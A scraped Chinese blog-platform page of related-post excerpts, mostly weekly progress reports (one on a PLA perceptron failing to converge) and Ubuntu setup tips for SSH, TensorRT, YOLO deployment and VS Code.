数据挖掘第流周周报 1、本周工作 本周主要是添加了PLA线性感知算法python版本,打算与神经网络、,KNN一起对数据处理,对测试集进行了分类,但是由于在PLA分类中,对于数据量太大的情况,对于PLA的权值更新有很大的阻碍,迟迟没办法收敛,我现控制一下权值迭代的次数,但是多次下来发现耗时太大,效果也不好,所以暂时没有用PLA作为分类。 W=np.ones(cols)#initial all weight with 1 count=0 while True: count.
第二学期第六周周报
passport404的博客
04-12 138
本周计划 1、java学习 2、学习树的相关知识。 3、二叉树的前后中序遍历 实现情况 1、java数据结构学习到集合框架,List接口及它的各种用法。 2、树学习了二叉树的前后中序遍历。 javaSE总结成果展示 下周计划 继续java数据结构的学习。 ...
第六周工作周报1
08-08
【本周工作周报1】 本周的工作集中在7组的考生管理系统前端开发上,对接人方圆在2020年12月30日提交了本周的工作报告。主要工作内容包括: 1. **考生管理系统前端开发** - 本周的核心任务是完成该系统的前端部分,...
第六周周报0415-20192115641
08-08
《校园导览系统》项目的第六周周报展示了团队在地图构建、概要设计以及详细设计等方面取得的显著进展。以下是具体的知识点总结: 1. **算法与数据结构**: - **Dijkstra算法**:已完成100%的学习并移植到项目中,...
计科-编译原理课程设计-第9组-第6周周报1
08-03
在本次《编译原理与技术课程设计》的第9组第6周周报中,小组成员主要关注了从语法分析树到抽象语法树(AST)的转换、符号表的建立以及中间代码生成(AST转LLVM IR)的过程。以下是这些知识点的详细说明: 1. **语法...
机械设备行业第6周周报:制造业景气依旧,新兴制造业需求旺盛.pdf
07-11
机械设备行业第6周周报:制造业景气依旧,新兴制造业需求旺盛.pdf
汽车第6周周报:疫情短期冲击不改行业复苏态势.zip
10-17
这份名为“汽车第6周周报:疫情短期冲击不改行业复苏态势”的压缩包文件,主要聚焦于汽车行业在特定时间段(第6周)内受到新冠疫情的影响以及行业整体的复苏趋势。尽管遭受了短期的冲击,但汽车行业仍显示出积极的...
Ubuntu Grub引导优化
liwangjin0116的专栏
07-18 369
如果安装了双系统或多系统,可以考虑配置此参数。
解决xshell连接不上ubuntu首次安装的虚拟机问题
科研小白一枚~ 愿上天不会辜负每一个努力的菜鸟!
07-18 318
首次安装完虚拟机,主机和虚拟机之间互ping都没问题,但是xshell登不上去,基本上原因就是虚拟机没有安装ssh服务。4、再次打开xshell就可以进行连接了。
Ubuntu16.04环境下Baxter机器人开发环境搭建要点说明
qq_48922607的博客
07-18 552
Ubuntu16.04环境下Baxter机器人开发环境搭建与ubuntu20.04相比的主要差异说明
Ubuntu 22.04安装Visual Studio Code(VS Code)配置C++,Python
qq_53545309的博客
07-20 806
在首页的左侧有两个蓝色的按钮,点击左边的按钮,下载.deb格式的安装包,下载完成后得到如下文件。
ubuntu22.04下YOLOv5 TensorRT模型部署
qq_53545309的博客
07-19 482
如果您对tensorrt不是很熟悉,请务必保持下面库版本一致。请注意:以下库,务必去进入系统bios下,关闭安全启动(设置 secure boot 为 disable)
Ubuntu 24.04 LTS 无法打开Chrome浏览器
最新发布
zzy_ucas的博客
07-23 192
删除本地配置文件,再次点击Chrome图标,即可打开。
Ubuntu22.04版本的YOLOv8TensorRT模型部署
qq_53545309的博客
07-19 2162
如何使用代码导出onnx文件。你将会的到例如:yolov8n.trt、yolov8s.trt、yolov8m.trt等文件。yaml是官方提供的配置文件,如果是自己训练的模型,那就设置为自定义yaml文件即可。
ubuntu23安装tensorRT步骤记录
heshiyuan1406146854的博客
07-19 434
依次选择 Linux--》x86_64--》ubuntu-->22.04-->runfile(local),( ps:不能选择 deb(local),因为 cuda自带了显卡驱动,而且自带的还不好使,而选择 deb(local)的安装方式,安装过程中无法对。1.2. https://blog.csdn.net/m0_46825740/article/details/121418113( ubuntu篇---ubuntu20.04安装cuda和cudnn )更低的运算精度部署后速度更快。
Ubuntu 22及以上版本的cpu频率及温度控制(台式机也适用)
yzqlyzql的博客
07-20 332
Ubuntu版本大于等于22时,GTK版本会变为4.0。此时,indicator-cpufreq便无法运行(其仅能运行在GTK 3.0下)。来进行cpu的工作模式选择和频率控制。当前系统版本为Ubuntu 22.04,炫龙M7笔记本,CPU为AMD 3600,GPU为2070。详细的介绍请参照github,如果打不开github,可以将其导入gitee或其它类似的平台再进行下载安装。auto-cpufreq具有图形化界面,安装完成后可以在应用中找到该软件。直到没有任何报错安装完成时,才是真正的安装好了。
编写一份Java电商项目的第二周周报
03-13
你好,以下是Java电商项目第二周的周报: 本周工作内容: 1. 完成了商品分类模块的数据库设计和代码编写; 2. 完成了商品列表展示模块的数据库设计和代码编写; 3. 完成了购物车模块的数据库设计和代码编写; 4. 完成了订单模块的数据库设计和代码编写; 5. 完成了用户登录、注册模块的数据库设计和代码编写; 6. 完成了用户个人中心模块的数据库设计和代码编写。 下周工作计划: 1. 完成商品详情页模块的数据库设计和代码编写; 2. 完成支付模块的数据库设计和代码编写; 3. 完成物流模块的数据库设计和代码编写; 4. 完成评价模块的数据库设计和代码编写; 5. 完成优惠券模块的数据库设计和代码编写; 6. 完成后台管理模块的数据库设计和代码编写。 以上是本周和下周的工作内容和计划,如有问题请及时沟通。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值